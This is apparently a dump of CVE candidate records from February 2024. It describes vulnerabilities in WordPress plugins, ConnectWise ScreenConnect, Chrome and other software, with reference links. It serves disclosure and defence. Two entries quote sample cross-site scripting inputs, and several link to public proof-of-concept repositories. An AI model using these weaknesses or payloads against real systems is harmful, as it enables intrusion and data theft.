CVE 2024 1719 Candidate The Easy PayPal & Stripe Buy Now Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.3 and in Contact Form 7 – PayPal & Stripe Add-on all versions up to, and including 2.1. This is due to missing or incorrect nonce validation on the 'wpecpp_stripe_connect_completion' function. This makes it possible for unauthenticated attackers to modify the plugins settings and chance the stripe connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040958%40contact-form-7-paypal-add-on&new=3040958%40contact-form-7-paypal-add-on&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040958%40contact-form-7-paypal-add-on&new=3040958%40contact-form-7-paypal-add-on&sfp_email=&sfph_mail= | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040962%40wp-ecommerce-paypal&new=3040962%40wp-ecommerce-paypal&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040962%40wp-ecommerce-paypal&new=3040962%40wp-ecommerce-paypal&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5276227-9bd4-4ad8-a6b7-ac7d05e8b056?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5276227-9bd4-4ad8-a6b7-ac7d05e8b056?source=cve Assigned (20240221)
CVE 2024 1714 Candidate An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an entitlement with a value containing leading or trailing whitespace is requested by an authenticated user in an access request. MISC:https://www.sailpoint.com/security-advisories/sailpoint-identityiq-access-request-for-entitlement-values-with-leading-trailing-whitespace-cve-2024-1714/ | URL:https://www.sailpoint.com/security-advisories/sailpoint-identityiq-access-request-for-entitlement-values-with-leading-trailing-whitespace-cve-2024-1714/ Assigned (20240221)
CVE 2024 1713 Candidate A user who can create objects in a database with plv8 3.2.1 installed is able to cause deferred triggers to execute as the Superuser during autovacuum. MISC:https://github.com/google/security-research/security/advisories/GHSA-r7m9-grw7-vcc4 | URL:https://github.com/google/security-research/security/advisories/GHSA-r7m9-grw7-vcc4 Assigned (20240221)
CVE 2024 1711 Candidate The Create by Mediavine plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.9.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://wordpress.org/plugins/mediavine-create/ | URL:https://wordpress.org/plugins/mediavine-create/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve Assigned (20240221)
CVE 2024 1710 Candidate The Addon Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the onAjaxAction function action in all versions up to, and including, 1.3.76. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions including uploading arbitrary files. MISC:https://plugins.trac.wordpress.org/browser/addon-library/trunk/inc_php/unitecreator_actions.class.php#L39 | URL:https://plugins.trac.wordpress.org/browser/addon-library/trunk/inc_php/unitecreator_actions.class.php#L39 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve Assigned (20240221)
CVE 2024 1709 Candidate ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems. MISC:https://github.com/rapid7/metasploit-framework/pull/18870 | URL:https://github.com/rapid7/metasploit-framework/pull/18870 | MISC:https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc | URL:https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc | MISC:https://techcrunch.com/2024/02/21/researchers-warn-high-risk-connectwise-flaw-under-attack-is-embarrassingly-easy-to-exploit/ | URL:https://techcrunch.com/2024/02/21/researchers-warn-high-risk-connectwise-flaw-under-attack-is-embarrassingly-easy-to-exploit/ | MISC:https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/ | URL:https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/ | MISC:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 | URL:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 | MISC:https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/ | URL:https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/ | MISC:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass | URL:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass | MISC:https://www.huntress.com/blog/detection-guidance-for-connectwise-cwe-288-2 | URL:https://www.huntress.com/blog/detection-guidance-for-connectwise-cwe-288-2 | MISC:https://www.huntress.com/blog/vulnerability-reproduced-immediately-patch-screenconnect-23-9-8 | URL:https://www.huntress.com/blog/vulnerability-reproduced-immediately-patch-screenconnect-23-9-8 | MISC:https://www.securityweek.com/connectwise-confirms-screenconnect-flaw-under-active-exploitation/ | URL:https://www.securityweek.com/connectwise-confirms-screenconnect-flaw-under-active-exploitation/ Assigned (20240221)
CVE 2024 1708 Candidate ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems. MISC:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 | URL:https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 | MISC:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass | URL:https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass Assigned (20240221)
CVE 2024 1707 Candidate A vulnerability, which was classified as problematic, was found in GARO WALLBOX GLB+ T2EV7 0.5. This affects an unknown part of the file /index.jsp#settings of the component Software Update Handler. The manipulation of the argument Reference leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254397 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254397 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254397 | MISC:VDB-254397 | GARO WALLBOX GLB+ T2EV7 Software Update index.jsp#settings cross site scripting | URL:https://vuldb.com/?id.254397 | MISC:https://drive.google.com/file/d/1spsElvU8rgCs4gUxc662SCBjTI9VAqth/view | URL:https://drive.google.com/file/d/1spsElvU8rgCs4gUxc662SCBjTI9VAqth/view | MISC:https://github.com/strik3r0x1/Vulns/blob/main/GARO_GLBDCMB-T274WO_Stored_XSS.md | URL:https://github.com/strik3r0x1/Vulns/blob/main/GARO_GLBDCMB-T274WO_Stored_XSS.md Assigned (20240221)
CVE 2024 1706 Candidate A vulnerability, which was classified as problematic, has been found in ZKTeco ZKBio Access IVS up to 3.3.2. Affected by this issue is some unknown functionality of the component Department Name Search Bar. The manipulation with the input <marquee>hi leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254396. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254396 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254396 | MISC:VDB-254396 | ZKTeco ZKBio Access IVS Department Name Search Bar cross site scripting | URL:https://vuldb.com/?id.254396 | MISC:https://gist.githubusercontent.com/whiteman007/8d3a09991de4ef336937ba91c07b7856/raw/adc00538d7a8c3c54bde4797a10d9b6af393711d/gistfile1.txt | URL:https://gist.githubusercontent.com/whiteman007/8d3a09991de4ef336937ba91c07b7856/raw/adc00538d7a8c3c54bde4797a10d9b6af393711d/gistfile1.txt Assigned (20240221)
CVE 2024 1705 Candidate A vulnerability was found in Shopwind up to 4.6. It has been rated as critical. This issue affects the function actionCreate of the file /public/install/controllers/DefaultController.php of the component Installation. The manipulation leads to code injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-254393 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254393 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254393 | MISC:VDB-254393 | Shopwind Installation DefaultController.php actionCreate code injection | URL:https://vuldb.com/?id.254393 | MISC:https://note.zhaoj.in/share/QHdXavkw5eDm | URL:https://note.zhaoj.in/share/QHdXavkw5eDm Assigned (20240221)
CVE 2024 1704 Candidate A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been declared as critical. This vulnerability affects the function save/delete of the file /adminapi/system/crud. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254392 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254392 | MISC:VDB-254392 | ZhongBangKeJi CRMEB crud delete path traversal | URL:https://vuldb.com/?id.254392 | MISC:https://github.com/Echosssy/CVE/blob/main/%E4%BC%97%E9%82%A6%E7%A7%91%E6%8A%80CRMEB%20Mall%20business%20edition%20overrides%20any%20file.docx | URL:https://github.com/Echosssy/CVE/blob/main/%E4%BC%97%E9%82%A6%E7%A7%91%E6%8A%80CRMEB%20Mall%20business%20edition%20overrides%20any%20file.docx Assigned (20240221)
CVE 2024 1703 Candidate A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been classified as problematic. This affects the function openfile of the file /adminapi/system/file/openfile. The manipulation leads to absolute path traversal. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254391. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254391 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254391 | MISC:VDB-254391 | ZhongBangKeJi CRMEB openfile absolute path traversal | URL:https://vuldb.com/?id.254391 | MISC:https://github.com/Echosssy/-CRMEB-Mall-commercial-version-of-any-file-read-vulnerability/blob/main/README.md | URL:https://github.com/Echosssy/-CRMEB-Mall-commercial-version-of-any-file-read-vulnerability/blob/main/README.md Assigned (20240221)
CVE 2024 1702 Candidate A vulnerability was found in keerti1924 PHP-MYSQL-User-Login-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /edit.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254390 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254390 | MISC:VDB-254390 | keerti1924 PHP-MYSQL-User-Login-System edit.php sql injection | URL:https://vuldb.com/?id.254390 | MISC:https://github.com/omarexala/PHP-MYSQL-User-Login-System---SQL-Injection | URL:https://github.com/omarexala/PHP-MYSQL-User-Login-System---SQL-Injection Assigned (20240221)
CVE 2024 1701 Candidate A vulnerability has been found in keerti1924 PHP-MYSQL-User-Login-System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /edit.php. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254389 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254389 | MISC:VDB-254389 | keerti1924 PHP-MYSQL-User-Login-System edit.php access control | URL:https://vuldb.com/?id.254389 | MISC:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Broken-Access-Control | URL:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Broken-Access-Control Assigned (20240221)
CVE 2024 1700 Candidate A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. Affected is an unknown function of the file /signup.php. The manipulation of the argument username with the input <script>alert("xss")</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254388 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254388 | MISC:VDB-254388 | keerti1924 PHP-MYSQL-User-Login-System signup.php cross site scripting | URL:https://vuldb.com/?id.254388 | MISC:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Stored-XSS | URL:https://github.com/omarexala/PHP-MYSQL-User-Login-System---Stored-XSS Assigned (20240221)
CVE 2024 1698 Candidate The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php | URL:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php | MISC:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php | URL:https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve Assigned (20240221)
CVE 2024 1697 Candidate The Custom WooCommerce Checkout Fields Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the save_wcfe_options function in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.2.9/classes/class-wc-checkout-field-editor.php#L1775 | URL:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.2.9/classes/class-wc-checkout-field-editor.php#L1775 | MISC:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.3.2/classes/class-wc-checkout-field-editor.php#L1788 | URL:https://plugins.trac.wordpress.org/browser/add-fields-to-checkout-page-woocommerce/tags/1.3.2/classes/class-wc-checkout-field-editor.php#L1788 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92f44b-6f2b-439c-8245-ace189740425?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92f44b-6f2b-439c-8245-ace189740425?source=cve Assigned (20240221)
CVE 2024 1696 Candidate In Santesoft Sante FFT Imaging versions 1.4.1 and prior once a user opens a malicious DCM file on affected FFT Imaging installations, a local attacker could perform an out-of-bounds write, which could allow for arbitrary code execution. MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-065-01 | URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-065-01 Assigned (20240221)
CVE 2024 1691 Candidate The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file upload form, which allows SVG uploads, in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that the patch in 2.6.4 allows SVG uploads but the uploaded SVG files are sanitized. MISC:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro | URL:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve Assigned (20240220)
CVE 2024 1690 Candidate The TeraWallet – Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the terawallet_export_user_search() function in all versions up to, and including, 1.4.10. This makes it possible for authenticated attackers, with subscriber-level access and above, to export a list of registered users and their emails. MISC:https://plugins.trac.wordpress.org/changeset/3043412/woo-wallet/trunk/includes/class-woo-wallet-ajax.php | URL:https://plugins.trac.wordpress.org/changeset/3043412/woo-wallet/trunk/includes/class-woo-wallet-ajax.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve Assigned (20240220)
CVE 2024 1687 Candidate The Thank You Page Customizer for WooCommerce – Increase Your Sales plugin for WordPress is vulnerable to unauthorized execution of shortcodes due to a missing capability check on the get_text_editor_content() function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/310afe02-3a51-4633-b359-65ae58d0c032?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/310afe02-3a51-4633-b359-65ae58d0c032?source=cve Assigned (20240220)
CVE 2024 1686 Candidate The Thank You Page Customizer for WooCommerce – Increase Your Sales plugin for WordPress is vulnerable to missing authorization e in all versions up to, and including, 1.1.2 via the apply_layout function due to a missing capability check. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve arbitrary order data which may contain PII. MISC:https://plugins.trac.wordpress.org/changeset/3041096/woo-thank-you-page-customizer/trunk/frontend/frontend.php | URL:https://plugins.trac.wordpress.org/changeset/3041096/woo-thank-you-page-customizer/trunk/frontend/frontend.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve Assigned (20240220)
CVE 2024 1685 Candidate The Social Media Share Buttons plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.0 via deserialization of untrusted input through the attachmentUrl parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/social-media-builder/trunk/classes/SgmbButton.php#L32 | URL:https://plugins.trac.wordpress.org/browser/social-media-builder/trunk/classes/SgmbButton.php#L32 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve Assigned (20240220)
CVE 2024 1684 Candidate The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form file field CSS metabox in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro | URL:https://store.themeisle.com/?edd_action=view_changelog&name=Otter%20Pro | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve Assigned (20240220)
CVE 2024 1683 Candidate A DLL injection vulnerability exists where an authenticated, low-privileged local attacker could modify application files on the TIE Secure Relay host, which could allow for overriding of the configuration and running of new Secure Relay services. MISC:https://www.tenable.com/security/tns-2024-03 | URL:https://www.tenable.com/security/tns-2024-03 Assigned (20240220)
CVE 2024 1680 Candidate The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Settings URL of the Banner, Team Members, and Image Scroll widgets in all versions up to, and including, 4.10.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3041548/premium-addons-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3041548/premium-addons-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve Assigned (20240220)
CVE 2024 1676 Candidate Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Low) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/40944847 | URL:https://issues.chromium.org/issues/40944847 Assigned (20240220)
CVE 2024 1675 Candidate Insufficient policy enforcement in Download in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/41486208 | URL:https://issues.chromium.org/issues/41486208 Assigned (20240220)
CVE 2024 1674 Candidate Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/40095183 | URL:https://issues.chromium.org/issues/40095183 Assigned (20240220)
CVE 2024 1673 Candidate Use after free in Accessibility in Google Chrome prior to 122.0.6261.57 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via specific UI gestures. (Chromium security severity: Medium) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/41490491 | URL:https://issues.chromium.org/issues/41490491 Assigned (20240220)
CVE 2024 1672 Candidate Inappropriate implementation in Content Security Policy in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/41485789 | URL:https://issues.chromium.org/issues/41485789 Assigned (20240220)
CVE 2024 1671 Candidate Inappropriate implementation in Site Isolation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/41487933 | URL:https://issues.chromium.org/issues/41487933 Assigned (20240220)
CVE 2024 1670 Candidate Use after free in Mojo in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/41481374 | URL:https://issues.chromium.org/issues/41481374 Assigned (20240220)
CVE 2024 1669 Candidate Out of bounds memory access in Blink in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-4adf990562 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/ | FEDORA:FEDORA-2024-6a879cfa63 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html | MISC:https://issues.chromium.org/issues/41495060 | URL:https://issues.chromium.org/issues/41495060 Assigned (20240220)
CVE 2024 1668 Candidate The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 7.11.5 via the form entries page. This makes it possible for authenticated attackers, with contributor access and above, to view the contents of all form submissions, including fields that are obfuscated (such as the contact form's "password" field). MISC:https://gist.github.com/Xib3rR4dAr/91bd37338022b15379f393356d1056a1 | URL:https://gist.github.com/Xib3rR4dAr/91bd37338022b15379f393356d1056a1 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd224169-ae51-4af8-b6de-706ed580ff8d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd224169-ae51-4af8-b6de-706ed580ff8d?source=cve Assigned (20240220)
